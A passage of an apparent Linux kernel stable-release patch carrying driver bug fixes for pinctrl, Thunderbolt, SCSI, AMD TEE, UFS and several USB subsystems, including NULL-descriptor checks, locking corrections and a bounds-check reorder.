+ 	mutex_unlock(&pinctrl_list_mutex);
+-	return NULL;
++	return p;
+ }
+ 
+ static void pinctrl_free(struct pinctrl *p, bool inlist);
+@@ -1126,7 +1129,6 @@ struct pinctrl *pinctrl_get(struct device *dev)
+ 	p = find_pinctrl(dev);
+ 	if (p) {
+ 		dev_dbg(dev, "obtain a copy of previously claimed pinctrl\n");
+-		kref_get(&p->users);
+ 		return p;
+ 	}
+ 
+diff --git a/drivers/pinctrl/nuvoton/pinctrl-wpcm450.c b/drivers/pinctrl/nuvoton/pinctrl-wpcm450.c
+index 8193b92da4031..274e01d5212d5 100644
+--- a/drivers/pinctrl/nuvoton/pinctrl-wpcm450.c
++++ b/drivers/pinctrl/nuvoton/pinctrl-wpcm450.c
+@@ -1041,13 +1041,13 @@ static int wpcm450_gpio_register(struct platform_device *pdev,
+ 		if (ret < 0)
+ 			return ret;
+ 
+-		gpio = &pctrl->gpio_bank[reg];
+-		gpio->pctrl = pctrl;
+-
+ 		if (reg >= WPCM450_NUM_BANKS)
+ 			return dev_err_probe(dev, -EINVAL,
+ 					     "GPIO index %d out of range!\n", reg);
+ 
++		gpio = &pctrl->gpio_bank[reg];
++		gpio->pctrl = pctrl;
++
+ 		bank = &wpcm450_banks[reg];
+ 		gpio->bank = bank;
+ 
+diff --git a/drivers/pinctrl/renesas/Kconfig b/drivers/pinctrl/renesas/Kconfig
+index 0903a0a418319..1ef8759802618 100644
+--- a/drivers/pinctrl/renesas/Kconfig
++++ b/drivers/pinctrl/renesas/Kconfig
+@@ -240,6 +240,7 @@ config PINCTRL_RZN1
+ 	depends on OF
+ 	depends on ARCH_RZN1 || COMPILE_TEST
+ 	select GENERIC_PINCONF
++	select PINMUX
+ 	help
+ 	  This selects pinctrl driver for Renesas RZ/N1 devices.
+ 
+diff --git a/drivers/platform/x86/hp/hp-wmi.c b/drivers/platform/x86/hp/hp-wmi.c
+index 3bacee2b8d521..51f23ff1f2b05 100644
+--- a/drivers/platform/x86/hp/hp-wmi.c
++++ b/drivers/platform/x86/hp/hp-wmi.c
+@@ -1399,7 +1399,13 @@ static const struct dev_pm_ops hp_wmi_pm_ops = {
+ 	.restore  = hp_wmi_resume_handler,
+ };
+ 
+-static struct platform_driver hp_wmi_driver = {
++/*
++ * hp_wmi_bios_remove() lives in .exit.text. For drivers registered via
++ * module_platform_driver_probe() this is ok because they cannot get unbound at
++ * runtime. So mark the driver struct with __refdata to prevent modpost
++ * triggering a section mismatch warning.
++ */
++static struct platform_driver hp_wmi_driver __refdata = {
+ 	.driver = {
+ 		.name = "hp-wmi",
+ 		.pm = &hp_wmi_pm_ops,
+diff --git a/drivers/platform/x86/think-lmi.c b/drivers/platform/x86/think-lmi.c
+index f6290221d139d..6641f934f15bf 100644
+--- a/drivers/platform/x86/think-lmi.c
++++ b/drivers/platform/x86/think-lmi.c
+@@ -1245,6 +1245,24 @@ static void tlmi_release_attr(void)
+ 	kset_unregister(tlmi_priv.authentication_kset);
+ }
+ 
++static int tlmi_validate_setting_name(struct kset *attribute_kset, char *name)
++{
++	struct kobject *duplicate;
++
++	if (!strcmp(name, "Reserved"))
++		return -EINVAL;
++
++	duplicate = kset_find_obj(attribute_kset, name);
++	if (duplicate) {
++		pr_debug("Duplicate attribute name found - %s\n", name);
++		/* kset_find_obj() returns a reference */
++		kobject_put(duplicate);
++		return -EBUSY;
++	}
++
++	return 0;
++}
++
+ static int tlmi_sysfs_init(void)
+ {
+ 	int i, ret;
+@@ -1273,10 +1291,8 @@ static int tlmi_sysfs_init(void)
+ 			continue;
+ 
+ 		/* check for duplicate or reserved values */
+-		if (kset_find_obj(tlmi_priv.attribute_kset, tlmi_priv.setting[i]->display_name) ||
+-		    !strcmp(tlmi_priv.setting[i]->display_name, "Reserved")) {
+-			pr_debug("duplicate or reserved attribute name found - %s\n",
+-				tlmi_priv.setting[i]->display_name);
++		if (tlmi_validate_setting_name(tlmi_priv.attribute_kset,
++					       tlmi_priv.setting[i]->display_name) < 0) {
+ 			kfree(tlmi_priv.setting[i]->possible_values);
+ 			kfree(tlmi_priv.setting[i]);
+ 			tlmi_priv.setting[i] = NULL;
+diff --git a/drivers/scsi/scsi_scan.c b/drivers/scsi/scsi_scan.c
+index ed26c52ed8474..bab00b65bc9d1 100644
+--- a/drivers/scsi/scsi_scan.c
++++ b/drivers/scsi/scsi_scan.c
+@@ -1619,12 +1619,13 @@ int scsi_rescan_device(struct scsi_device *sdev)
+ 	device_lock(dev);
+ 
+ 	/*
+-	 * Bail out if the device is not running. Otherwise, the rescan may
+-	 * block waiting for commands to be executed, with us holding the
+-	 * device lock. This can result in a potential deadlock in the power
+-	 * management core code when system resume is on-going.
++	 * Bail out if the device or its queue are not running. Otherwise,
++	 * the rescan may block waiting for commands to be executed, with us
++	 * holding the device lock. This can result in a potential deadlock
++	 * in the power management core code when system resume is on-going.
+ 	 */
+-	if (sdev->sdev_state != SDEV_RUNNING) {
++	if (sdev->sdev_state != SDEV_RUNNING ||
++	    blk_queue_pm_only(sdev->request_queue)) {
+ 		ret = -EWOULDBLOCK;
+ 		goto unlock;
+ 	}
+diff --git a/drivers/tee/amdtee/core.c b/drivers/tee/amdtee/core.c
+index 372d64756ed64..3c15f6a9e91c0 100644
+--- a/drivers/tee/amdtee/core.c
++++ b/drivers/tee/amdtee/core.c
+@@ -217,12 +217,12 @@ unlock:
+ 	return rc;
+ }
+ 
++/* mutex must be held by caller */
+ static void destroy_session(struct kref *ref)
+ {
+ 	struct amdtee_session *sess = container_of(ref, struct amdtee_session,
+ 						   refcount);
+ 
+-	mutex_lock(&session_list_mutex);
+ 	list_del(&sess->list_node);
+ 	mutex_unlock(&session_list_mutex);
+ 	kfree(sess);
+@@ -272,7 +272,8 @@ int amdtee_open_session(struct tee_context *ctx,
+ 	if (arg->ret != TEEC_SUCCESS) {
+ 		pr_err("open_session failed %d\n", arg->ret);
+ 		handle_unload_ta(ta_handle);
+-		kref_put(&sess->refcount, destroy_session);
++		kref_put_mutex(&sess->refcount, destroy_session,
++			       &session_list_mutex);
+ 		goto out;
+ 	}
+ 
+@@ -290,7 +291,8 @@ int amdtee_open_session(struct tee_context *ctx,
+ 		pr_err("reached maximum session count %d\n", TEE_NUM_SESSIONS);
+ 		handle_close_session(ta_handle, session_info);
+ 		handle_unload_ta(ta_handle);
+-		kref_put(&sess->refcount, destroy_session);
++		kref_put_mutex(&sess->refcount, destroy_session,
++			       &session_list_mutex);
+ 		rc = -ENOMEM;
+ 		goto out;
+ 	}
+@@ -331,7 +333,7 @@ int amdtee_close_session(struct tee_context *ctx, u32 session)
+ 	handle_close_session(ta_handle, session_info);
+ 	handle_unload_ta(ta_handle);
+ 
+-	kref_put(&sess->refcount, destroy_session);
++	kref_put_mutex(&sess->refcount, destroy_session, &session_list_mutex);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/thunderbolt/icm.c b/drivers/thunderbolt/icm.c
+index 86521ebb25794..69b2ca95fe37a 100644
+--- a/drivers/thunderbolt/icm.c
++++ b/drivers/thunderbolt/icm.c
+@@ -41,6 +41,7 @@
+ #define PHY_PORT_CS1_LINK_STATE_SHIFT	26
+ 
+ #define ICM_TIMEOUT			5000	/* ms */
++#define ICM_RETRIES			3
+ #define ICM_APPROVE_TIMEOUT		10000	/* ms */
+ #define ICM_MAX_LINK			4
+ 
+@@ -296,10 +297,9 @@ static bool icm_copy(struct tb_cfg_request *req, const struct ctl_pkg *pkg)
+ 
+ static int icm_request(struct tb *tb, const void *request, size_t request_size,
+ 		       void *response, size_t response_size, size_t npackets,
+-		       unsigned int timeout_msec)
++		       int retries, unsigned int timeout_msec)
+ {
+ 	struct icm *icm = tb_priv(tb);
+-	int retries = 3;
+ 
+ 	do {
+ 		struct tb_cfg_request *req;
+@@ -410,7 +410,7 @@ static int icm_fr_get_route(struct tb *tb, u8 link, u8 depth, u64 *route)
+ 		return -ENOMEM;
+ 
+ 	ret = icm_request(tb, &request, sizeof(request), switches,
+-			  sizeof(*switches), npackets, ICM_TIMEOUT);
++			  sizeof(*switches), npackets, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		goto err_free;
+ 
+@@ -463,7 +463,7 @@ icm_fr_driver_ready(struct tb *tb, enum tb_security_level *security_level,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -488,7 +488,7 @@ static int icm_fr_approve_switch(struct tb *tb, struct tb_switch *sw)
+ 	memset(&reply, 0, sizeof(reply));
+ 	/* Use larger timeout as establishing tunnels can take some time */
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_APPROVE_TIMEOUT);
++			  1, ICM_RETRIES, ICM_APPROVE_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -515,7 +515,7 @@ static int icm_fr_add_switch_key(struct tb *tb, struct tb_switch *sw)
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -543,7 +543,7 @@ static int icm_fr_challenge_switch_key(struct tb *tb, struct tb_switch *sw,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -577,7 +577,7 @@ static int icm_fr_approve_xdomain_paths(struct tb *tb, struct tb_xdomain *xd,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1022,7 +1022,7 @@ icm_tr_driver_ready(struct tb *tb, enum tb_security_level *security_level,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, 20000);
++			  1, 10, 2000);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1055,7 +1055,7 @@ static int icm_tr_approve_switch(struct tb *tb, struct tb_switch *sw)
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_APPROVE_TIMEOUT);
++			  1, ICM_RETRIES, ICM_APPROVE_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1083,7 +1083,7 @@ static int icm_tr_add_switch_key(struct tb *tb, struct tb_switch *sw)
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1112,7 +1112,7 @@ static int icm_tr_challenge_switch_key(struct tb *tb, struct tb_switch *sw,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1146,7 +1146,7 @@ static int icm_tr_approve_xdomain_paths(struct tb *tb, struct tb_xdomain *xd,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1172,7 +1172,7 @@ static int icm_tr_xdomain_tear_down(struct tb *tb, struct tb_xdomain *xd,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1498,7 +1498,7 @@ icm_ar_driver_ready(struct tb *tb, enum tb_security_level *security_level,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1524,7 +1524,7 @@ static int icm_ar_get_route(struct tb *tb, u8 link, u8 depth, u64 *route)
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1545,7 +1545,7 @@ static int icm_ar_get_boot_acl(struct tb *tb, uuid_t *uuids, size_t nuuids)
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1606,7 +1606,7 @@ static int icm_ar_set_boot_acl(struct tb *tb, const uuid_t *uuids,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1628,7 +1628,7 @@ icm_icl_driver_ready(struct tb *tb, enum tb_security_level *security_level,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, 20000);
++			  1, ICM_RETRIES, 20000);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -2300,7 +2300,7 @@ static int icm_usb4_switch_op(struct tb_switch *sw, u16 opcode, u32 *metadata,
+ 
+ 	memset(&reply, 0, sizeof(reply));
+ 	ret = icm_request(tb, &request, sizeof(request), &reply, sizeof(reply),
+-			  1, ICM_TIMEOUT);
++			  1, ICM_RETRIES, ICM_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/thunderbolt/switch.c b/drivers/thunderbolt/switch.c
+index 9699d167d522d..55698a0978f03 100644
+--- a/drivers/thunderbolt/switch.c
++++ b/drivers/thunderbolt/switch.c
+@@ -2763,6 +2763,13 @@ int tb_switch_lane_bonding_enable(struct tb_switch *sw)
+ 	    !tb_port_is_width_supported(down, 2))
+ 		return 0;
+ 
++	/*
++	 * Both lanes need to be in CL0. Here we assume lane 0 already be in
++	 * CL0 and check just for lane 1.
++	 */
++	if (tb_wait_for_port(down->dual_link_port, false) <= 0)
++		return -ENOTCONN;
++
+ 	ret = tb_port_lane_bonding_enable(up);
+ 	if (ret) {
+ 		tb_port_warn(up, "failed to enable lane bonding\n");
+diff --git a/drivers/thunderbolt/xdomain.c b/drivers/thunderbolt/xdomain.c
+index 9a3c52f6b8c97..18e2ffd095a42 100644
+--- a/drivers/thunderbolt/xdomain.c
++++ b/drivers/thunderbolt/xdomain.c
+@@ -704,6 +704,27 @@ out_unlock:
+ 	mutex_unlock(&xdomain_lock);
+ }
+ 
++static void start_handshake(struct tb_xdomain *xd)
++{
++	xd->state = XDOMAIN_STATE_INIT;
++	queue_delayed_work(xd->tb->wq, &xd->state_work,
++			   msecs_to_jiffies(XDOMAIN_SHORT_TIMEOUT));
++}
++
++/* Can be called from state_work */
++static void __stop_handshake(struct tb_xdomain *xd)
++{
++	cancel_delayed_work_sync(&xd->properties_changed_work);
++	xd->properties_changed_retries = 0;
++	xd->state_retries = 0;
++}
++
++static void stop_handshake(struct tb_xdomain *xd)
++{
++	cancel_delayed_work_sync(&xd->state_work);
++	__stop_handshake(xd);
++}
++
+ static void tb_xdp_handle_request(struct work_struct *work)
+ {
+ 	struct xdomain_request_work *xw = container_of(work, typeof(*xw), work);
+@@ -766,6 +787,15 @@ static void tb_xdp_handle_request(struct work_struct *work)
+ 	case UUID_REQUEST:
+ 		tb_dbg(tb, "%llx: received XDomain UUID request\n", route);
+ 		ret = tb_xdp_uuid_response(ctl, route, sequence, uuid);
++		/*
++		 * If we've stopped the discovery with an error such as
++		 * timing out, we will restart the handshake now that we
++		 * received UUID request from the remote host.
++		 */
++		if (!ret && xd && xd->state == XDOMAIN_STATE_ERROR) {
++			dev_dbg(&xd->dev, "restarting handshake\n");
++			start_handshake(xd);
++		}
+ 		break;
+ 
+ 	case LINK_STATE_STATUS_REQUEST:
+@@ -1522,6 +1552,13 @@ static void tb_xdomain_queue_properties_changed(struct tb_xdomain *xd)
+ 			   msecs_to_jiffies(XDOMAIN_SHORT_TIMEOUT));
+ }
+ 
++static void tb_xdomain_failed(struct tb_xdomain *xd)
++{
++	xd->state = XDOMAIN_STATE_ERROR;
++	queue_delayed_work(xd->tb->wq, &xd->state_work,
++			   msecs_to_jiffies(XDOMAIN_DEFAULT_TIMEOUT));
++}
++
+ static void tb_xdomain_state_work(struct work_struct *work)
+ {
+ 	struct tb_xdomain *xd = container_of(work, typeof(*xd), state_work.work);
+@@ -1548,7 +1585,7 @@ static void tb_xdomain_state_work(struct work_struct *work)
+ 		if (ret) {
+ 			if (ret == -EAGAIN)
+ 				goto retry_state;
+-			xd->state = XDOMAIN_STATE_ERROR;
++			tb_xdomain_failed(xd);
+ 		} else {
+ 			tb_xdomain_queue_properties_changed(xd);
+ 			if (xd->bonding_possible)
+@@ -1613,7 +1650,7 @@ static void tb_xdomain_state_work(struct work_struct *work)
+ 		if (ret) {
+ 			if (ret == -EAGAIN)
+ 				goto retry_state;
+-			xd->state = XDOMAIN_STATE_ERROR;
++			tb_xdomain_failed(xd);
+ 		} else {
+ 			xd->state = XDOMAIN_STATE_ENUMERATED;
+ 		}
+@@ -1624,6 +1661,8 @@ static void tb_xdomain_state_work(struct work_struct *work)
+ 		break;
+ 
+ 	case XDOMAIN_STATE_ERROR:
++		dev_dbg(&xd->dev, "discovery failed, stopping handshake\n");
++		__stop_handshake(xd);
+ 		break;
+ 
+ 	default:
+@@ -1793,21 +1832,6 @@ static void tb_xdomain_release(struct device *dev)
+ 	kfree(xd);
+ }
+ 
+-static void start_handshake(struct tb_xdomain *xd)
+-{
+-	xd->state = XDOMAIN_STATE_INIT;
+-	queue_delayed_work(xd->tb->wq, &xd->state_work,
+-			   msecs_to_jiffies(XDOMAIN_SHORT_TIMEOUT));
+-}
+-
+-static void stop_handshake(struct tb_xdomain *xd)
+-{
+-	cancel_delayed_work_sync(&xd->properties_changed_work);
+-	cancel_delayed_work_sync(&xd->state_work);
+-	xd->properties_changed_retries = 0;
+-	xd->state_retries = 0;
+-}
+-
+ static int __maybe_unused tb_xdomain_suspend(struct device *dev)
+ {
+ 	stop_handshake(tb_to_xdomain(dev));
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index b4e3f14b9a3d7..6ba4ef2c3949e 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -6749,7 +6749,7 @@ static int ufshcd_clear_tm_cmd(struct ufs_hba *hba, int tag)
+ 			mask, 0, 1000, 1000);
+ 
+ 	dev_err(hba->dev, "Clearing task management function with tag %d %s\n",
+-		tag, err ? "succeeded" : "failed");
++		tag, err < 0 ? "failed" : "succeeded");
+ 
+ out:
+ 	return err;
+diff --git a/drivers/usb/cdns3/cdnsp-gadget.c b/drivers/usb/cdns3/cdnsp-gadget.c
+index f9aa50ff14d42..0044897ee800d 100644
+--- a/drivers/usb/cdns3/cdnsp-gadget.c
++++ b/drivers/usb/cdns3/cdnsp-gadget.c
+@@ -1125,6 +1125,9 @@ static int cdnsp_gadget_ep_dequeue(struct usb_ep *ep,
+ 	unsigned long flags;
+ 	int ret;
+ 
++	if (request->status != -EINPROGRESS)
++		return 0;
++
+ 	if (!pep->endpoint.desc) {
+ 		dev_err(pdev->dev,
+ 			"%s: can't dequeue to disabled endpoint\n",
+diff --git a/drivers/usb/cdns3/core.h b/drivers/usb/cdns3/core.h
+index 4a4dbc2c15615..81a9c9d6be08b 100644
+--- a/drivers/usb/cdns3/core.h
++++ b/drivers/usb/cdns3/core.h
+@@ -131,8 +131,7 @@ void cdns_set_active(struct cdns *cdns, u8 set_active);
+ #else /* CONFIG_PM_SLEEP */
+ static inline int cdns_resume(struct cdns *cdns)
+ { return 0; }
+-static inline int cdns_set_active(struct cdns *cdns, u8 set_active)
+-{ return 0; }
++static inline void cdns_set_active(struct cdns *cdns, u8 set_active) { }
+ static inline int cdns_suspend(struct cdns *cdns)
+ { return 0; }
+ #endif /* CONFIG_PM_SLEEP */
+diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
+index 0069a24bd216c..81c8f564cf878 100644
+--- a/drivers/usb/core/hub.c
++++ b/drivers/usb/core/hub.c
+@@ -151,6 +151,10 @@ int usb_device_supports_lpm(struct usb_device *udev)
+ 	if (udev->quirks & USB_QUIRK_NO_LPM)
+ 		return 0;
+ 
++	/* Skip if the device BOS descriptor couldn't be read */
++	if (!udev->bos)
++		return 0;
++
+ 	/* USB 2.1 (and greater) devices indicate LPM support through
+ 	 * their USB 2.0 Extended Capabilities BOS descriptor.
+ 	 */
+@@ -327,6 +331,10 @@ static void usb_set_lpm_parameters(struct usb_device *udev)
+ 	if (!udev->lpm_capable || udev->speed < USB_SPEED_SUPER)
+ 		return;
+ 
++	/* Skip if the device BOS descriptor couldn't be read */
++	if (!udev->bos)
++		return;
++
+ 	hub = usb_hub_to_struct_hub(udev->parent);
+ 	/* It doesn't take time to transition the roothub into U0, since it
+ 	 * doesn't have an upstream link.
+@@ -2705,13 +2713,17 @@ out_authorized:
+ static enum usb_ssp_rate get_port_ssp_rate(struct usb_device *hdev,
+ 					   u32 ext_portstatus)
+ {
+-	struct usb_ssp_cap_descriptor *ssp_cap = hdev->bos->ssp_cap;
++	struct usb_ssp_cap_descriptor *ssp_cap;
+ 	u32 attr;
+ 	u8 speed_id;
+ 	u8 ssac;
+ 	u8 lanes;
+ 	int i;
+ 
++	if (!hdev->bos)
++		goto out;
++
++	ssp_cap = hdev->bos->ssp_cap;
+ 	if (!ssp_cap)
+ 		goto out;
+ 
+@@ -4187,8 +4199,15 @@ static void usb_enable_link_state(struct usb_hcd *hcd, struct usb_device *udev,
+ 		enum usb3_link_state state)
+ {
+ 	int timeout;
+-	__u8 u1_mel = udev->bos->ss_cap->bU1devExitLat;
+-	__le16 u2_mel = udev->bos->ss_cap->bU2DevExitLat;
++	__u8 u1_mel;
++	__le16 u2_mel;
++
++	/* Skip if the device BOS descriptor couldn't be read */
++	if (!udev->bos)
++		return;
++
++	u1_mel = udev->bos->ss_cap->bU1devExitLat;
++	u2_mel = udev->bos->ss_cap->bU2DevExitLat;
+ 
+ 	/* If the device says it doesn't have *any* exit latency to come out of
+ 	 * U1 or U2, it's probably lying.  Assume it doesn't implement that link
+diff --git a/drivers/usb/core/hub.h b/drivers/usb/core/hub.h
+index b2925856b4cb4..bc66205ca52c3 100644
+--- a/drivers/usb/core/hub.h
++++ b/drivers/usb/core/hub.h
+@@ -145,7 +145,7 @@ static inline int hub_is_superspeedplus(struct usb_device *hdev)
+ {
+ 	return (hdev->descriptor.bDeviceProtocol == USB_HUB_PR_SS &&
+ 		le16_to_cpu(hdev->descriptor.bcdUSB) >= 0x0310 &&
+-		hdev->bos->ssp_cap);
++		hdev->bos && hdev->bos->ssp_cap);
+ }
+ 
+ static inline unsigned hub_power_on_good_delay(struct usb_hub *hub)
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 3ee70ffaf0035..57e2f4cc744f7 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -279,9 +279,46 @@ int dwc3_core_soft_reset(struct dwc3 *dwc)
+ 	 * XHCI driver will reset the host block. If dwc3 was configured for
+ 	 * host-only mode or current role is host, then we can return early.
+ 	 */
+-	if (dwc->dr_mode == USB_DR_MODE_HOST || dwc->current_dr_role == DWC3_GCTL_PRTCAP_HOST)
++	if (dwc->current_dr_role == DWC3_GCTL_PRTCAP_HOST)
+ 		return 0;
+ 
++	/*
++	 * If the dr_mode is host and the dwc->current_dr_role is not the
++	 * corresponding DWC3_GCTL_PRTCAP_HOST, then the dwc3_core_init_mode
++	 * isn't executed yet. Ensure the phy is ready before the controller
++	 * updates the GCTL.PRTCAPDIR or other settings by soft-resetting
++	 * the phy.
++	 *
++	 * Note: GUSB3PIPECTL[n] and GUSB2PHYCFG[n] are port settings where n
++	 * is port index. If this is a multiport host, then we need to reset
++	 * all active ports.
++	 */
++	if (dwc->dr_mode == USB_DR_MODE_HOST) {
++		u32 usb3_port;
++		u32 usb2_port;
++
++		usb3_port = dwc3_readl(dwc->regs, DWC3_GUSB3PIPECTL(0));
++		usb3_port |= DWC3_GUSB3PIPECTL_PHYSOFTRST;
++		dwc3_writel(dwc->regs, DWC3_GUSB3PIPECTL(0), usb3_port);
++
++		usb2_port = dwc3_readl(dwc->regs, DWC3_GUSB2PHYCFG(0));
++		usb2_port |= DWC3_GUSB2PHYCFG_PHYSOFTRST;
++		dwc3_writel(dwc->regs, DWC3_GUSB2PHYCFG(0), usb2_port);
++
++		/* Small delay for phy reset assertion */
++		usleep_range(1000, 2000);
++
++		usb3_port &= ~DWC3_GUSB3PIPECTL_PHYSOFTRST;
++		dwc3_writel(dwc->regs, DWC3_GUSB3PIPECTL(0), usb3_port);
++
++		usb2_port &= ~DWC3_GUSB2PHYCFG_PHYSOFTRST;
++		dwc3_writel(dwc->regs, DWC3_GUSB2PHYCFG(0), usb2_port);
++
++		/* Wait for clock synchronization */
++		msleep(50);
++		return 0;
++	}
++
+ 	reg = dwc3_readl(dwc->regs, DWC3_DCTL);
+ 	reg |= DWC3_DCTL_CSFTRST;
+ 	reg &= ~DWC3_DCTL_RUN_STOP;
+diff --git a/drivers/usb/gadget/function/f_ncm.c b/drivers/usb/gadget/function/f_ncm.c
+index 424bb3b666dbd..faf90a2174194 100644
+--- a/drivers/usb/gadget/function/f_ncm.c
++++ b/drivers/usb/gadget/function/f_ncm.c
+@@ -1171,7 +1171,8 @@ static int ncm_unwrap_ntb(struct gether *port,
+ 			  struct sk_buff_head *list)
+ {
+ 	struct f_ncm	*ncm = func_to_ncm(&port->func);
+-	__le16		*tmp = (void *) skb->data;
++	unsigned char	*ntb_ptr = skb->data;
++	__le16		*tmp;
+ 	unsigned	index, index2;
+ 	int		ndp_index;
+ 	unsigned	dg_len, dg_len2;
+@@ -1184,6 +1185,10 @@ static int ncm_unwrap_ntb(struct gether *port,
+ 	const struct ndp_parser_opts *opts = ncm->parser_opts;
+ 	unsigned	crc_len = ncm->is_crc ? sizeof(uint32_t) : 0;
+ 	int		dgram_counter;
++	int		to_process = skb->len;
++
++parse_ntb:
++	tmp = (__le16 *)ntb_ptr;
+ 
+ 	/* dwSignature */
+ 	if (get_unaligned_le32(tmp) != opts->nth_sign) {
+@@ -1230,7 +1235,7 @@ static int ncm_unwrap_ntb(struct gether *port,
+ 		 * walk through NDP
+ 		 * dwSignature
+ 		 */
+-		tmp = (void *)(skb->data + ndp_index);
++		tmp = (__le16 *)(ntb_ptr + ndp_index);
+ 		if (get_unaligned_le32(tmp) != ncm->ndp_sign) {
+ 			INFO(port->func.config->cdev, "Wrong NDP SIGN\n");
+ 			goto err;
+@@ -1287,11 +1292,11 @@ static int ncm_unwrap_ntb(struct gether *port,
+ 			if (ncm->is_crc) {
+ 				uint32_t crc, crc2;
+ 
+-				crc = get_unaligned_le32(skb->data +
++				crc = get_unaligned_le32(ntb_ptr +
+ 							 index + dg_len -
+ 							 crc_len);
+ 				crc2 = ~crc32_le(~0,
+-						 skb->data + index,
++						 ntb_ptr + index,
+ 						 dg_len - crc_len);
+ 				if (crc != crc2) {
+ 					INFO(port->func.config->cdev,
+@@ -1318,7 +1323,7 @@ static int ncm_unwrap_ntb(struct gether *port,
+ 							 dg_len - crc_len);
+ 			if (skb2 == NULL)
+ 				goto err;
+-			skb_put_data(skb2, skb->data + index,
++			skb_put_data(skb2, ntb_ptr + index,
+ 				     dg_len - crc_len);
+ 
+ 			skb_queue_tail(list, skb2);
+@@ -1331,10 +1336,17 @@ static int ncm_unwrap_ntb(struct gether *port,
+ 		} while (ndp_len > 2 * (opts->dgram_item_len * 2));
+ 	} while (ndp_index);
+ 
+-	dev_consume_skb_any(skb);
+-
+ 	VDBG(port->func.config->cdev,
+ 	     "Parsed NTB with %d frames\n", dgram_counter);
++
++	to_process -= block_len;
++	if (to_process != 0) {
++		ntb_ptr = (unsigned char *)(ntb_ptr + block_len);
++		goto parse_ntb;
++	}
++
++	dev_consume_skb_any(skb);
++
+ 	return 0;
+ err:
+ 	skb_queue_purge(list);
+diff --git a/drivers/usb/gadget/udc/udc-xilinx.c b/drivers/usb/gadget/udc/udc-xilinx.c
+index 4827e3cd38340..4c7a4f7703c21 100644
+--- a/drivers/usb/gadget/udc/udc-xilinx.c
++++ b/drivers/usb/gadget/udc/udc-xilinx.c
+@@ -499,11 +499,13 @@ static int xudc_eptxrx(struct xusb_ep *ep, struct xusb_req *req,
+ 		/* Get the Buffer address and copy the transmit data.*/
